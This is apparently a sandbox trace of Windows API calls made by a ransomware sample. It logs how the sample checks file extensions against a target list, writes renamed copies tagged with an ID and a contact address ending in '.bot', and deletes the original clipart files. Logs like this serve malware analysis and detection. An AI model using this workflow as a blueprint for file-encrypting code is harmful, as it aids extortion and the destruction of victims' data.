	[0150.891] ReadFile (in: hFile=0x1b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.891] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.891] SetEndOfFile (hFile=0x3c8) returned 1
	[0150.891] CloseHandle (hObject=0x3c8) returned 1
	[0150.891] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.891] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.893] CloseHandle (hObject=0x1b8) returned 1
	[0150.893] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.893] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf")) returned 1
	[0150.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.894] lstrlenW (lpString=".doc") returned 4
	[0150.894] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.894] lstrlenW (lpString=".docx") returned 5
	[0150.894] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0150.894] lstrlenW (lpString=".pdf") returned 4
	[0150.894] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.894] lstrlenW (lpString=".xls") returned 4
	[0150.894] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.894] lstrlenW (lpString=".xlsx") returned 5
	[0150.894] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0150.894] lstrlenW (lpString=".ppt") returned 4
	[0150.894] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.894] lstrlenW (lpString=".zip") returned 4
	[0150.894] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.894] lstrlenW (lpString=".rar") returned 4
	[0150.894] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.894] lstrlenW (lpString=".bz2") returned 4
	[0150.894] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString=".7z") returned 3
	[0150.895] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.895] lstrlenW (lpString=".dbf") returned 4
	[0150.895] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.895] lstrlenW (lpString=".1cd") returned 4
	[0150.895] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.895] lstrlenW (lpString=".jpg") returned 4
	[0150.895] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.895] lstrlenW (lpString=".doc") returned 4
	[0150.895] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString=".docx") returned 5
	[0150.895] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0150.895] lstrlenW (lpString=".pdf") returned 4
	[0150.895] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString=".xls") returned 4
	[0150.895] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.895] lstrlenW (lpString=".xlsx") returned 5
	[0150.895] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0150.895] lstrlenW (lpString=".ppt") returned 4
	[0150.895] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.895] lstrlenW (lpString=".zip") returned 4
	[0150.895] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.895] lstrlenW (lpString=".rar") returned 4
	[0150.895] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.895] lstrlenW (lpString=".bz2") returned 4
	[0150.896] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.896] lstrlenW (lpString=".7z") returned 3
	[0150.896] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.896] lstrlenW (lpString=".dbf") returned 4
	[0150.896] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.896] lstrlenW (lpString=".1cd") returned 4
	[0150.896] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF") returned 63
	[0150.896] lstrlenW (lpString=".jpg") returned 4
	[0150.896] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.896] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0150.896] lstrlenW (lpString="J0099148.JPG") returned 12
	[0150.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.897] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=18258) returned 1
	[0150.897] CloseHandle (hObject=0x1b8) returned 1
	[0150.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg")) returned 0x20
	[0150.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.897] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.897] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0150.898] GetLastError () returned 0x0
	[0150.898] ReadFile (in: hFile=0x1b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4752, lpOverlapped=0x0) returned 1
	[0150.955] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4760, lpOverlapped=0x0) returned 1
	[0150.956] ReadFile (in: hFile=0x1b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.956] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.956] SetEndOfFile (hFile=0x3c8) returned 1
	[0150.956] CloseHandle (hObject=0x3c8) returned 1
	[0150.957] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.957] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.959] CloseHandle (hObject=0x1b8) returned 1
	[0150.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.985] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg")) returned 1
	[0151.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.051] lstrlenW (lpString=".doc") returned 4
	[0151.051] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.051] lstrlenW (lpString=".docx") returned 5
	[0151.051] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0151.051] lstrlenW (lpString=".pdf") returned 4
	[0151.051] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.051] lstrlenW (lpString=".xls") returned 4
	[0151.052] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.052] lstrlenW (lpString=".xlsx") returned 5
	[0151.052] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0151.052] lstrlenW (lpString=".ppt") returned 4
	[0151.052] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.052] lstrlenW (lpString=".zip") returned 4
	[0151.052] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.052] lstrlenW (lpString=".rar") returned 4
	[0151.052] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.052] lstrlenW (lpString=".bz2") returned 4
	[0151.052] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.052] lstrlenW (lpString=".7z") returned 3
	[0151.052] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.052] lstrlenW (lpString=".dbf") returned 4
	[0151.052] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.052] lstrlenW (lpString=".1cd") returned 4
	[0151.052] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.052] lstrlenW (lpString=".jpg") returned 4
	[0151.052] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.052] lstrlenW (lpString=".doc") returned 4
	[0151.052] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.052] lstrlenW (lpString=".docx") returned 5
	[0151.052] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0151.052] lstrlenW (lpString=".pdf") returned 4
	[0151.052] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.053] lstrlenW (lpString=".xls") returned 4
	[0151.053] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.053] lstrlenW (lpString=".xlsx") returned 5
	[0151.053] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0151.053] lstrlenW (lpString=".ppt") returned 4
	[0151.053] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.053] lstrlenW (lpString=".zip") returned 4
	[0151.053] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.053] lstrlenW (lpString=".rar") returned 4
	[0151.053] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.053] lstrlenW (lpString=".bz2") returned 4
	[0151.053] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.053] lstrlenW (lpString=".7z") returned 3
	[0151.053] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.053] lstrlenW (lpString=".dbf") returned 4
	[0151.053] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.053] lstrlenW (lpString=".1cd") returned 4
	[0151.053] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 63
	[0151.053] lstrlenW (lpString=".jpg") returned 4
	[0151.053] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.053] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0151.053] lstrlenW (lpString="J0099156.JPG") returned 12
	[0151.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0151.054] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13954) returned 1
	[0151.054] CloseHandle (hObject=0x3e0) returned 1
	[0151.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg")) returned 0x20
	[0151.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0151.054] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.055] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0151.055] GetLastError () returned 0x0
	[0151.055] ReadFile (in: hFile=0x3e0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3682, lpOverlapped=0x0) returned 1
	[0151.072] WriteFile (in: hFile=0x3d4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3690, lpOverlapped=0x0) returned 1
	[0151.073] ReadFile (in: hFile=0x3e0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.073] WriteFile (in: hFile=0x3d4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.073] SetEndOfFile (hFile=0x3d4) returned 1
	[0151.073] CloseHandle (hObject=0x3d4) returned 1
	[0151.073] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.073] SetEndOfFile (hFile=0x3e0) returned 1
	[0151.075] CloseHandle (hObject=0x3e0) returned 1
	[0151.076] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0151.076] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg")) returned 1
	[0151.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.076] lstrlenW (lpString=".doc") returned 4
	[0151.076] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.076] lstrlenW (lpString=".docx") returned 5
	[0151.076] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0151.076] lstrlenW (lpString=".pdf") returned 4
	[0151.077] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.077] lstrlenW (lpString=".xls") returned 4
	[0151.077] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.077] lstrlenW (lpString=".xlsx") returned 5
	[0151.077] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0151.077] lstrlenW (lpString=".ppt") returned 4
	[0151.077] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.077] lstrlenW (lpString=".zip") returned 4
	[0151.077] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.077] lstrlenW (lpString=".rar") returned 4
	[0151.077] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.077] lstrlenW (lpString=".bz2") returned 4
	[0151.077] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.077] lstrlenW (lpString=".7z") returned 3
	[0151.077] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.077] lstrlenW (lpString=".dbf") returned 4
	[0151.077] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.077] lstrlenW (lpString=".1cd") returned 4
	[0151.077] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.077] lstrlenW (lpString=".jpg") returned 4
	[0151.077] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.078] lstrlenW (lpString=".doc") returned 4
	[0151.078] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.078] lstrlenW (lpString=".docx") returned 5
	[0151.078] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0151.078] lstrlenW (lpString=".pdf") returned 4
	[0151.078] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.078] lstrlenW (lpString=".xls") returned 4
	[0151.078] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.078] lstrlenW (lpString=".xlsx") returned 5
	[0151.078] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0151.078] lstrlenW (lpString=".ppt") returned 4
	[0151.078] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.078] lstrlenW (lpString=".zip") returned 4
	[0151.078] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.078] lstrlenW (lpString=".rar") returned 4
	[0151.078] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.078] lstrlenW (lpString=".bz2") returned 4
	[0151.078] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.078] lstrlenW (lpString=".7z") returned 3
	[0151.078] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.078] lstrlenW (lpString=".dbf") returned 4
	[0151.078] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.078] lstrlenW (lpString=".1cd") returned 4
	[0151.078] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 63
	[0151.078] lstrlenW (lpString=".jpg") returned 4
	[0151.079] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.079] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0151.079] lstrlenW (lpString="J0099158.WMF") returned 12
	[0151.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0151.079] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=26160) returned 1
	[0151.079] CloseHandle (hObject=0x3e0) returned 1
	[0151.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf")) returned 0x20
	[0151.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0151.080] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.080] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0151.080] GetLastError () returned 0x0
	[0151.080] ReadFile (in: hFile=0x3e0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x6630, lpOverlapped=0x0) returned 1
	[0151.950] WriteFile (in: hFile=0x3d4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x6640, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x6640, lpOverlapped=0x0) returned 1
	[0151.951] ReadFile (in: hFile=0x3e0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
